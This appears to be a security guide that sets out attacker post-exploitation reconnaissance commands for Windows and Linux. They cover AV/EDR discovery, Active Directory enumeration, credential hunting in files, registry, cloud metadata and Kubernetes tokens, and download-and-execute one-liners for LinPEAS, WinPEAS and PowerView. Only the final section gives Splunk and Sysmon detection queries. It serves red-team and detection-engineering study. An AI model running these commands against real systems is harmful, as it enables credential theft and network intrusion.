Post-Exploitation Reconnaissance: What Attackers Do After Getting In

by

Penetration testers and red teams spend a lot of time on post-exploitation reconnaissance — figuring out where they are, who they are, and what they can access. These same tools and techniques are used by real attackers, so defenders need to understand exactly what information an attacker gathers after gaining access. This guide covers the essential reconnaissance commands for both Windows and Linux environments.

Windows Post-Exploitation Reconnaissance

Basic System Information

# System overview
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
hostname
whoami /all   # Current user + all privileges and groups
echo %COMPUTERNAME%
echo %USERDOMAIN%

# Check current user privileges
whoami /priv   # Look for SeDebugPrivilege, SeImpersonatePrivilege (privilege escalation opportunities)
net user %USERNAME%
net localgroup Administrators

# Check if we are on a domain
net config workstation | findstr /i "domain|logon"
nltest /domain_trusts

# Running processes (looking for AV/EDR products to evade)
tasklist /SVC   # List processes with services
tasklist | findstr /i "defender|crowdstrike|carbon|cylance|sentinel|tanium"
Get-Process | Where-Object {$_.Name -match "av|defense|protect|guard|sensor|agent"}

Network Reconnaissance

# Network configuration
ipconfig /all   # All interfaces, DNS servers, DHCP info
route print     # Routing table (identify network segments)
arp -a          # ARP cache (recently communicated hosts)
netstat -ano    # All connections with PIDs
netstat -ano | findstr LISTENING   # Find listening services

# Find other live hosts in subnet (using built-in ping)
for /L %i in (1,1,254) do @ping -n 1 -w 100 192.168.1.%i | findstr "Reply"

# PowerShell network scanner
1..254 | ForEach-Object {$ip = "192.168.1.$_"; if (Test-Connection -ComputerName $ip -Count 1 -Quiet -TimeoutSeconds 1) {Write-Host "ALIVE: $ip"}}

# Find domain controllers
nslookup -type=srv _ldap._tcp.dc._msdcs.DOMAIN.LOCAL
nltest /dclist:DOMAIN.LOCAL
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers

Active Directory Enumeration

# Domain reconnaissance using built-in tools only
net user /domain                              # All domain users
net group "Domain Admins" /domain            # Domain admin members
net group "Enterprise Admins" /domain        # Enterprise admin members
net accounts /domain                          # Password policy

# Find all domain computers
net group "Domain Computers" /domain

# Find users with admin access to specific machine
net localgroup Administrators \COMPUTERNAME

# PowerShell: Enumerate AD (no external tools needed)
# Find all users with SPN (Kerberoastable)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Select SamAccountName, ServicePrincipalName

# Find accounts with password never expires (common service account weakness)
Get-ADUser -Filter {PasswordNeverExpires -eq $true} | Select SamAccountName, PasswordLastSet

# Find inactive accounts (potential for reuse)
$cutoff = (Get-Date).AddDays(-90)
Get-ADUser -Filter {LastLogonDate -lt $cutoff -and Enabled -eq $true} | Select SamAccountName, LastLogonDate

Credential Hunting on Windows

# Search for password files
dir /s /b C: | findstr /i "password|passwd|credential|secret|config"
findstr /si password *.txt *.ini *.config *.xml 2>nul

# Check for credentials in common locations
type C:WindowsPantherUnattendUnattended.xml  # Windows setup files
type C:inetpubwwwrootweb.config               # IIS config (DB passwords)
type "C:Program FilesFileZilla ServerFileZilla Server.xml"
reg query HKLM /f password /t REG_SZ /s  # Registry passwords
reg query HKCUSoftwareSimonTathamPuTTYSessions  # PuTTY saved sessions (may contain passwords)

# Search for SSH keys
dir /s /b %USERPROFILE%.sshdir /s /b C:Users /A | findstr /i "id_rsa|id_dsa|.pem|.key"

# Check Windows Credential Manager
cmdkey /list                    # List stored credentials
# Retrieve via Mimikatz:
# vault::cred /patch

Linux Post-Exploitation Reconnaissance

System and User Information

# System overview
id                     # Current user/groups
whoami
uname -a              # Kernel version (look for privilege escalation)
cat /etc/os-release   # OS info
hostname
env                   # Environment variables (tokens, passwords?)
cat /proc/version

# Check sudo rights (key privilege escalation path)
sudo -l               # What can we run as root?
cat /etc/sudoers 2>/dev/null
find / -perm -4000 -type f 2>/dev/null  # SUID binaries (privesc)
find / -perm -2000 -type f 2>/dev/null  # SGID binaries

# Interesting files
cat /etc/passwd       # All user accounts (look for non-standard users)
cat /etc/shadow 2>/dev/null  # Password hashes (if we can read it)
cat /etc/crontab      # Scheduled tasks (privesc through writable scripts)
ls -la /etc/cron.*

# Check history files for credentials
cat ~/.bash_history
cat ~/.zsh_history
cat ~/.mysql_history
find / -name "*.bash_history" 2>/dev/null

Network Reconnaissance on Linux

# Network information
ip addr show
ip route show
cat /etc/resolv.conf    # DNS servers
netstat -tulnp 2>/dev/null || ss -tulnp  # Listening services
arp -a                  # ARP cache

# Internal network discovery
for i in {1..254}; do (ping -c 1 -W 1 192.168.1.$i &>/dev/null && echo "ALIVE: 192.168.1.$i") & done; wait

# Check for internal services
cat /etc/hosts          # Local DNS entries (reveals internal hostnames)
netstat -tulnp | grep "127|::1"  # Localhost-only services (often more vulnerable)

Linux Credential Hunting

# Find password files
find / -name "*.conf" -exec grep -l "password|passwd" {} ; 2>/dev/null
grep -r "password" /var/www/html/ 2>/dev/null  # Web app config files
find / -name "*.env" 2>/dev/null              # Environment files with secrets

# Database credentials
cat /var/www/html/wp-config.php   # WordPress DB credentials
find / -name "database.yml" 2>/dev/null       # Rails database config
cat /opt/app/config/config.yml 2>/dev/null

# SSH keys
find / -name "id_rsa" -o -name "id_dsa" -o -name "id_ed25519" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null   # Who can SSH here?
cat ~/.ssh/known_hosts                        # Systems this machine connects to

# Docker/Kubernetes secrets
cat /run/secrets/* 2>/dev/null               # Docker Swarm secrets
cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null  # K8s service account

# AWS credentials on the machine
cat ~/.aws/credentials
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/  # AWS instance metadata

Automated Enumeration Tools

# LinPEAS: Linux Privilege Escalation Awesome Script
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Highlights privilege escalation paths in color: red = critical

# WinPEAS: Windows equivalent
certutil.exe -urlcache -f https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe winpeas.exe
.winpeas.exe

# PowerView: AD enumeration (PowerShell)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')
Get-Domain
Get-DomainUser -SPN
Get-DomainGroupMember "Domain Admins" -Recurse
Find-LocalAdminAccess  # Find all machines where current user is local admin

How Defenders Detect Post-Exploitation Recon

# Sysmon Event ID 1: Process creation - flag recon commands
# Rule: Any of these commands executed by non-admin user
# whoami /all, net group "Domain Admins" /domain, nltest, nslookup -type=srv

# Splunk: Detect LOLBin recon chain
index=windows EventCode=1
| where CommandLine IN ("*whoami /all*","*net user /domain*","*net group*domain*","*nltest*","*arp -a*")
| stats count by host user CommandLine | sort -count

# Detect LinPEAS/WinPEAS execution
index=windows EventCode=1 CommandLine="*peass*" OR CommandLine="*winpeas*" OR CommandLine="*linpeas*"

# Detect PowerView usage
index=windows EventCode=4104
| search ScriptBlockText="*Get-DomainUser*" OR ScriptBlockText="*Find-LocalAdminAccess*" OR ScriptBlockText="*Invoke-Kerberoast*"

# Alert on LSASS access (credential dumping always follows recon)
index=windows EventCode=10 TargetImage="*lsass.exe"
| where NOT SourceImage IN ("C:\Windows\System32\*","C:\Windows\SysWOW64\*")

Understanding attacker reconnaissance is fundamental to threat hunting and detection engineering. Every command in this guide generates specific, detectable log entries. The goal is not to make recon impossible — it is to make it loud enough that your SIEM catches it before the attacker reaches their objective. Map every technique here to a MITRE ATT&CK ID, build a Sigma rule, and add it to your detection library.